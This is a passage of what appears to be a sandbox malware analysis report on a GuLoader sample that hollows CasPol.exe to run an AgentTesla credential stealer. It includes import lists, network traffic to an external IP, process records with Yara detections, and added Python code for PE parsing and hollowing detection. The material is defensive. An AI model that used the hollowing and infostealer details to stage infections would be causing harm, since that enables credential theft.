SHELL32.dll   SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll     IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll  ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll    SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll     SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll  GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
Language of compilation system  Country where language is spoken
English                         United States
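The header fields in this report (RELOCS_STRIPPED set next to DYNAMIC_BASE, an entrypoint of 0x403325 that falls inside .text, the per-section entropy column, and an NSIS archive appended after the last section) can all be recovered from the raw bytes with a short parser. The Python below is an added example written for this page, not Joe Sandbox code and not code from the sample. It builds a constructed PE32 image that copies the report's flag values rather than reading 6culQoI97a.exe, and the overlay check assumes the NSIS firstheader layout (flags, 0xDEADBEEF, then the "NullsoftInst" magic). Entropy is computed as Shannon entropy in bits per byte, the same scale as the Entropy column above.

```python
import math
import struct

# IMAGE_FILE_HEADER.Characteristics / IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (PE spec)
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
# NSIS firstheader: flags(4) | siginfo 0xDEADBEEF (little-endian) | "NullsoftInst"; assumed layout for the overlay check
NSIS_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 .. 8.0, as in the section table's Entropy column."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> NT headers -> section table and return the facts a triage script cares about."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, timestamp, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]     # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]    # ImageBase
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]     # DllCharacteristics

    sections, raw_end, entry_section = [], 0, None
    for i in range(nsec):
        hdr = opt + opt_size + i * 40                           # 40-byte IMAGE_SECTION_HEADER entries
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, hdr + 8)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name, "va": va, "vsize": vsize, "rawsize": rawsize,
                         "entropy": round(shannon_entropy(raw), 6)})
        raw_end = max(raw_end, rawptr + rawsize)
        if va <= entry_rva < va + max(vsize, rawsize):
            entry_section = name
    overlay = data[raw_end:]                                    # bytes after the last section's raw data
    return {
        "timestamp": timestamp,
        "entrypoint": image_base + entry_rva,
        "entry_section": entry_section,
        "sections": sections,
        "overlay_size": len(overlay),
        "nsis_overlay": NSIS_MAGIC in overlay,
        # ASLR needs relocation data; with RELOCS_STRIPPED the loader cannot rebase, so DYNAMIC_BASE has no effect
        "aslr_ineffective": bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED)
        and bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 for this demo (not the sample on this page): the report's header flags, a .text
    section of maximal entropy, a zero-filled .data section and an NSIS-style overlay."""
    e_lfanew, opt_size, nsec, file_align = 0x80, 224, 2, 0x200
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    # 0x010F = RELOCS_STRIPPED | EXECUTABLE_IMAGE | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED | 32BIT_MACHINE
    file_hdr = struct.pack("<HHIIIHH", 0x14C, nsec, 0x60FC909C, 0, 0, opt_size, 0x010F)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)               # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x3325)             # AddressOfEntryPoint (0x403325 - 0x400000)
    struct.pack_into("<I", opt, 28, 0x400000)           # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, file_align)  # SectionAlignment, FileAlignment
    struct.pack_into("<H", opt, 68, 2)                  # Subsystem: WINDOWS_GUI
    struct.pack_into("<H", opt, 70, 0x8540)             # DYNAMIC_BASE | NX_COMPAT | NO_SEH | TERMINAL_SERVER_AWARE
    struct.pack_into("<I", opt, 92, 16)                 # NumberOfRvaAndSizes
    text = bytes(range(256)) * 4                        # every byte value equally often -> exactly 8.0 bits
    data_sec = b"\0" * 0x200                            # all zero -> 0.0 bits
    sec_hdrs = (
        struct.pack("<8sIIIIIIHHI", b".text", 0x6230, 0x1000, len(text), 0x200, 0, 0, 0, 0, 0x60000020)
        + struct.pack("<8sIIIIIIHHI", b".data", len(data_sec), 0x8000, len(data_sec), 0x600, 0, 0, 0, 0, 0xC0000040)
    )
    headers = (dos + b"PE\0\0" + file_hdr + bytes(opt) + sec_hdrs).ljust(file_align, b"\0")
    overlay = struct.pack("<I", 0) + NSIS_MAGIC + b"\0" * 16   # flags, siginfo + magic, padding
    return headers + text + data_sec + overlay


if __name__ == "__main__":
    for key, value in parse_pe(build_sample_pe()).items():
        print(f"{key}: {value}")
```

The `aslr_ineffective` flag is the caveat worth keeping in mind when reading the header block above: DYNAMIC_BASE is set, but because relocations were stripped the loader cannot rebase the image, so it runs at 0x400000 every time, which is exactly what the absolute addresses in the entrypoint listing (for example `call dword ptr [004080B8h]` and `mov dword ptr [007A2F6Ch], eax`) rely on.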
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 28, 2022 19:17:55.642931938 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.664489031 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.664750099 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.665221930 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.689093113 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.689237118 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.689269066 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.689399958 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.689481974 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.689491034 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.689673901 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.689831972 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.710146904 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710237026 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710330009 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710347891 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.710536003 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710566044 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.710622072 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710679054 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710736990 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710743904 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.710745096 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.710819960 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710875988 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.710905075 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.710954905 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.711077929 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.711078882 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.711078882 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.711244106 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.730001926 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.730169058 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.730307102 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.730503082 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.730556965 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.730690002 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.730750084 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.730757952 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.730832100 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.730886936 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.730938911 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.730969906 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.731014013 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.731070042 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.731143951 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.731143951 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.731143951 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.731308937 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.731524944 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.749439001 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.749536037 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.749670029 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.749779940 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.750530958 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.750623941 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.750693083 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.750700951 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.750775099 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.750829935 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.750869036 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.750869036 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.750917912 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.750972033 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.751025915 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.751038074 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.751085043 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.751257896 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.751257896 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.769414902 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.769510031 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.769594908 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.769753933 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.770581007 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.770675898 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.770745039 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.770770073 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.770836115 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.770891905 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.770940065 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.770940065 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.770978928 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.771038055 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.771094084 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.771106958 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.771280050 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.771281004 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.771450996 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.789984941 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.790081024 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.790366888 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.791635990 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.791731119 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.791790009 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.791840076 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.791876078 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.791887045 CET  49810        80         192.168.11.20   195.178.120.24
Nov 28, 2022 19:17:55.791954994 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.792010069 CET  80           49810      195.178.120.24  192.168.11.20
Nov 28, 2022 19:17:55.792057037 CET  49810        80         192.168.11.20   195.178.120.24
              • 195.178.120.24

              Target ID:2
              Start time:19:17:09
              Start date:28/11/2022
              Path:C:\Users\user\Desktop\6culQoI97a.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\6culQoI97a.exe
              Imagebase:0x400000
              File size:334430 bytes
              MD5 hash:D9AA122B8C39444799E60EABBAB69502
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low

              Target ID:9
              Start time:19:17:34
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\6culQoI97a.exe
              Imagebase:0xbd0000
              File size:108664 bytes
              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:high

              Target ID:10
              Start time:19:17:34
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff71ab60000
              File size:875008 bytes
              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
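Target 9 above is the artifact behind the "Writes to foreign memory regions" signature: CasPol.exe, a .NET Framework binary under C:\Windows\Microsoft.NET, runs with the sample's own path as its command line. A command line that names a different executable than the process image is a common leftover of process hollowing (CreateProcess lets the application name and the command line differ), and the GuLoader Yara hit in the 00000009.00000000 memory snapshot points the same way. The Python below is an added example, not part of the Joe Sandbox report, that runs that check over process records constructed from the three entries above; the record fields (`target_id`, `path`, `commandline`) and the directory patterns are this example's own choices.

```python
import ntpath
import re

# Assumed path classes for the second, stronger indicator: a .NET Framework host binary whose
# command line points into a user-writable profile directory.
DOTNET_DIR = re.compile(r"^[a-z]:\\windows\\microsoft\.net\\framework(64)?\\", re.I)
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)


def commandline_image(cmdline: str) -> str:
    """Executable named by a Windows command line: a quoted first token, else everything up to the first space."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def hollowing_indicators(proc: dict) -> list:
    """Reasons a process record looks like a hollowed or injected host; empty list means nothing suspicious."""
    image = proc["path"]
    claimed = commandline_image(proc["commandline"])
    reasons = []
    # ntpath.normcase lowercases and normalises slashes, so System32 vs system32 is not a false hit
    if ntpath.normcase(claimed) != ntpath.normcase(image):
        reasons.append(f"command line names {claimed!r} but the image is {image!r}")
        if DOTNET_DIR.match(image) and USER_WRITABLE.match(claimed):
            reasons.append(".NET Framework binary carrying a command line from a user-writable path")
    return reasons


def triage(processes: list) -> dict:
    """Map target id -> indicator list for every record that raised at least one indicator."""
    findings = {}
    for proc in processes:
        reasons = hollowing_indicators(proc)
        if reasons:
            findings[proc["target_id"]] = reasons
    return findings


# Constructed from the three process records in this report.
PROCESSES = [
    {"target_id": 2, "path": r"C:\Users\user\Desktop\6culQoI97a.exe",
     "commandline": r"C:\Users\user\Desktop\6culQoI97a.exe"},
    {"target_id": 9, "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "commandline": r"C:\Users\user\Desktop\6culQoI97a.exe"},
    {"target_id": 10, "path": r"C:\Windows\System32\conhost.exe",
     "commandline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

if __name__ == "__main__":
    for target_id, reasons in triage(PROCESSES).items():
        print(f"Target {target_id}:")
        for reason in reasons:
            print(f"  - {reason}")
```

Treat the mismatch as an indicator to corroborate, not a verdict on its own: legitimate launchers can also pass an application name that differs from the command line, so a production rule should pair it with the memory-write signature the report already raised, or with the parent relationship (here Target 2 is the injector and Target 9 the host).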

              No disassembly